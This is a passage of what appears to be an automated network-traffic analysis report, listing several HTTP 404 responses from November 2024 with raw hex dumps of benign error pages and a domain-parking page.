74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:50:31 GMTServer: ApacheLast-Modified: Wed, 06 Nov 2024 18:10:13 GMTETag: "49d-626426de29b28"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:50:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:50:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:50:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:50:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 72 6b 65 74 70 6c 61 63 65 72 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:51:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:51:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 